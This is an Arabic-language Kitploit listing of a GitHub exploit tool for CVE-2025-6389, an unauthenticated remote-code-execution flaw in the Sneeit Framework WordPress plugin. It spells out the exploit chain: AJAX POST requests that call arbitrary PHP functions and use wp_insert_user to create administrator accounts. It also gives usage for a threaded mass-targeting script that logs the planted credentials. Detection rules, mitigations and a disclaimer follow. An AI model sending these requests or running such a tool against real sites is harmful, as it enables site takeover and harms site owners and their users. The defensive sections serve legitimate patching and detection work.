Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2025-6389
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - تنفيذ أكواد عن بُعد بدون مصادقة في sneeit_articles_pagination_callback

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-6389

Sneeit Framework <= 8.3 - تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في sneeit_articles_pagination_callback

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python

License

📡 لا تفوّت الإصدار القادم. تابع @KNxploited على تيليجرام — القناة المرجعية لثغرات CVE المُعلنة حديثًا، والاستغلالات الجاهزة للعمل، وأبحاث الأمن المتقدمة. الأول علمًا. الأول فعلًا.


🧠 نظرة عامة

CVE-2025-6389 هي ثغرة حرجة بتقييم CVSS 9.8 من نوع تنفيذ التعليمات البرمجية عن بُعد (RCE) اكتُشفت في إضافة Sneeit Framework الخاصة بووردبريس.

يكمن الخلل في دالة sneeit_articles_pagination_callback()، التي تمرّر مدخلات يوفّرها المستخدم بشكل أعمى إلى دالة call_user_func() في PHP — إذ يمكن لمهاجم غير مصادَق استدعاء أي دالة PHP بوسائط عشوائية، بما في ذلك wp_insert_user، ما يمنحه فعليًا صلاحيات مدير كاملة أو يتيح له تنفيذ أي كود على الخادم.

الحقلالتفاصيل
معرف CVECVE-2025-6389
الإضافةSneeit Framework (sneeit-framework)
الإصدارات المتأثرةجميع الإصدارات حتى 8.3 شاملة
نوع الثغرةتنفيذ التعليمات البرمجية عن بُعد (RCE)
متجه الهجومالشبكة — لا يتطلب مصادقة
نتيجة CVSS 3.19.8 حرجة
متجه CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
الأثراختراق كامل للخادم / الاستيلاء على حساب المدير
الباحثNxploited

💀 تعمّق في الثغرة

السبب الجذري هو إساءة استخدام دالة call_user_func() في PHP داخل معالج AJAX الخاص بالإضافة:

root@kitploit:~
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

لماذا هذه الثغرة حرجة؟

  • wp_ajax_nopriv_* = يمكن الوصول إليها من أي شخص، دون الحاجة إلى تسجيل الدخول
  • call_user_func($callback, $args) = استدعاء تعسفي لأي دالة
  • يمكن للمهاجم استدعاء var_dump أو system أو wp_insert_user أو eval أو أي دالة PHP/ووردبريس
  • يُعاد الرد مباشرة — ما يتيح RCE أعمى ومفصّلًا (Blind & Verbose)

⚔️ سلسلة الاستغلال

root@kitploit:~
Step 1 — Probe / Fingerprint
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Expected Response → array(1) { [0]=> string(4) "test" }
  ↓
Confirms: call_user_func() is reachable and reflecting output

──────────────────────────────────────────────────────────────────
Step 2 — Admin Account Creation
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Result → New administrator account silently created on target
  ↓
Full WordPress admin panel access achieved ✔️

⚙️ المتطلبات

root@kitploit:~
pip install requests rich
التبعيةالغرض
requestsطلبات HTTP مع دعم الجلسات والبروكسي
richلوحة تحكم حية في الطرفية، لوحات، مؤشرات تقدم
threadingمعالجة متزامنة لأهداف متعددة
queueتوزيع الأهداف بطريقة آمنة للخيوط

يتطلب Python 3.8+. تستخدم تلميحات الأنواع صيغة tuple[...] التي ظهرت في 3.9+ — استخدم 3.9+ للحصول على أفضل توافق.


📂 هيكل الملفات

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: successful targets + credentials
└── debug_responses/          # Auto-generated: raw server responses for debugging
    └── <target>.resp.txt

🚀 الاستخدام

الخطوة 1 — تحضير الأهداف

أنشئ ملف list.txt مع رابط واحد في كل سطر:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

الروابط التي لا تحتوي على http:// أو https:// تُضاف إليها تلقائيًا بادئة http://.


الخطوة 2 — تشغيل الاستغلال

root@kitploit:~
python CVE-2025-6389.py

سيُطلب منك:

root@kitploit:~
Targets file name (default list.txt): list.txt
Number of threads (default 10):       20

الخطوة 3 — لوحة التحكم الحية

تشغّل الأداة لوحة تحكم Rich لحظية تعرض:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                      │
│  Time     Target                              Result                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

الخطوة 4 — مراجعة النتائج

الاستغلالات الناجحة تُحفظ في success_results.txt:

root@kitploit:~
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

استجابات التصحيح (للأهداف الفاشلة) تُحفظ تحت debug_responses/:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← Raw server response for analysis

🖥️ مرجع وسائط البرنامج النصي

المطالبةالافتراضيالوصف
ملف الأهدافlist.txtملف يحتوي على روابط الأهداف
عدد الخيوط10 (الحد الأقصى: 200)عمليات متزامنة — زِدها لعمليات الفحص الشامل
كلمة المرورxplpass (مثبّتة في الكود)كلمة المرور المعيّنة لحسابات المدير المُنشأة
صيغة اسم المستخدمNxploited_XXXXتُنشأ تلقائيًا بلاحقة عشوائية من 4 أرقام

📊 توقيع الاكتشاف

يولّد هذا الاستغلال توقيع الشبكة التالي — وهو مفيد للمدافعين ولمؤلّفي قواعد WAF:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

قاعدة WAF / IDS (شبه كود):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT

🛡️ التخفيف والمعالجة

إذا كنت مالك موقع أو مطوّرًا أو مدافعًا، فاتخذ هذه الخطوات فورًا:

  • ✅ حدّث Sneeit Framework إلى إصدار أعلى من 8.3 إذا كان التصحيح متاحًا
  • ✅ عطّل واحذف الإضافة حتى يتم تأكيد وجود إصدار مصحّح
  • ✅ دقّق حسابات مدير ووردبريس المنشأة مؤخرًا بحثًا عن أي إدخالات غير مصرح بها
  • ✅ طبّق التحقق من صحة المدخلات على الخادم — لا تمرّر أبدًا مدخلات المستخدم إلى call_user_func()
  • ✅ احظر طلبات POST غير المصادقة إلى admin-ajax.php على مستوى WAF/جدار الحماية
  • ✅ راقب سجلات الخادم بحثًا عن استدعاءات إجراء AJAX الخاص بـ sneeit_articles_pagination
  • ✅ فعّل المصادقة الثنائية على جميع حسابات المدير الحالية كإجراء احتوائي

⚠️ إخلاء المسؤولية

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, running, or modifying this script, you explicitly agree:

  • You have EXPLICIT, WRITTEN authorization from the owner of every
    system you test. No exceptions.

  • You are operating within a controlled lab environment or during a
    formally scoped and authorized engagement.

  • You will NOT deploy this tool against any system, network, or
    infrastructure you do not have legal permission to test.

  • Nxploited and all contributors assume ZERO liability for any
    unauthorized use, damage, data loss, legal action, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit is a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — And all equivalent national and international cybercrime laws.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 المؤلف

الاسم المستعارNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 تابع @KNxploited على تيليجرام القناة التي تُنشر فيها الاستغلالات الحقيقية أولًا — ثغرات CVE وثغرات اليوم الصفري وPoCs وأبحاث الثغرات المتعمقة. تُحدَّث بانتظام. ابقَ متيقظًا.


صُنع بدقة بواسطة Nxploited · لأبحاث الأمن المصرح بها فقط · حرجة بتقييم CVSS 9.8
تنزيل الأداة